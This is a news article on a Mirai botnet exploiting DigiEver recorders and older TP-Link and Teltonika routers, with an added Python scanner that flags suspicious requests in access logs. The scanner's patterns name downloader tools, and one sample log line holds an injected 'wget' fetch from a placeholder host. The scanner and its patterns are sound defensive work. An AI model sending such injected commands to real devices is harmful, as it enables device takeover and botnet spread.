Hackers have begun hacking TP-Link routers and connecting them to a botnet

The new Mirai botnet is actively exploiting vulnerabilities in DigiEver DS-2105 Pro IP video recorders (NVRs) and legacy TP-Link routers.

Akamai researchers report that the botnet has been operating since at least September and targets devices with unpatched firmware.

The DigiEver vulnerability allows remote attackers to execute commands because of improper input validation in the URI /cgi-bin/cgi_main.cgi. Hackers use this flaw to inject malicious commands and download malware from external servers. The botnet also exploits CVE-2023-1389 in TP-Link devices and CVE-2018-17532 in Teltonika RUT9XX routers.

Compromised devices are used for DDoS attacks or further propagation of the worm. The botnet is distinguished by its use of XOR and ChaCha20 encryption, as well as compatibility with various architectures, including x86, ARM, and MIPS.

Users are advised to update firmware and monitor unusual device activity to mitigate risks.
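One way to act on the monitoring advice is to review web or reverse-proxy access logs for requests to the DigiEver URI named above that carry shell syntax. The following is an added example, not code from Akamai or the article; it assumes combined-format access logs from a proxy in front of the recorder, and the parameter name `field`, the heuristics and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

TARGET_PATH = "/cgi-bin/cgi_main.cgi"  # URI named in the article
# Combined log format: ip ident user [time] "METHOD URI PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<uri>\S+) [^"]*" (?P<status>\d{3})')
# Assumed heuristics, not signatures from the article.
SHELL_META = re.compile(r'[;|&`\n]|\$\(')
DOWNLOADERS = re.compile(r'\b(?:wget|curl|tftp|ftpget)\b', re.I)

def decode_fully(value, rounds=3):
    """Undo nested percent-encoding so %253B is treated like ';'."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_line(line):
    """Return a finding for a suspicious request to TARGET_PATH, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m["uri"].partition("?")
    if decode_fully(path) != TARGET_PATH:
        return None
    reasons = []
    for pair in query.split("&"):  # split first so '&' separators are not flagged
        name, _, value = pair.partition("=")
        value = decode_fully(value)
        if SHELL_META.search(value):
            reasons.append(f"shell metacharacter in '{name}'")
        if DOWNLOADERS.search(value):
            reasons.append(f"downloader command in '{name}'")
    if not reasons:
        return None
    return {"ip": m["ip"], "status": m["status"], "reasons": reasons}

def scan(lines):
    """Collect findings for every suspicious line in an iterable of log lines."""
    return [f for f in map(inspect_line, lines) if f]

# Constructed sample lines (documentation IP ranges, hypothetical parameter "field").
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2025:10:00:00 +0000] "GET /cgi-bin/cgi_main.cgi?field=pool.example.org HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2025:10:00:05 +0000] "GET /cgi-bin/cgi_main.cgi?field=a%3Bwget+http%3A%2F%2F192.0.2.1%2Fx HTTP/1.1" 200 87',
    '203.0.113.9 - - [01/Jan/2025:10:00:09 +0000] "GET /index.html?q=a%3Bb HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Access logs record only the request line, so anything sent in a POST body is invisible to this check; POST requests to the same URI from unexpected sources need separate review.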


By Natasha Kumar
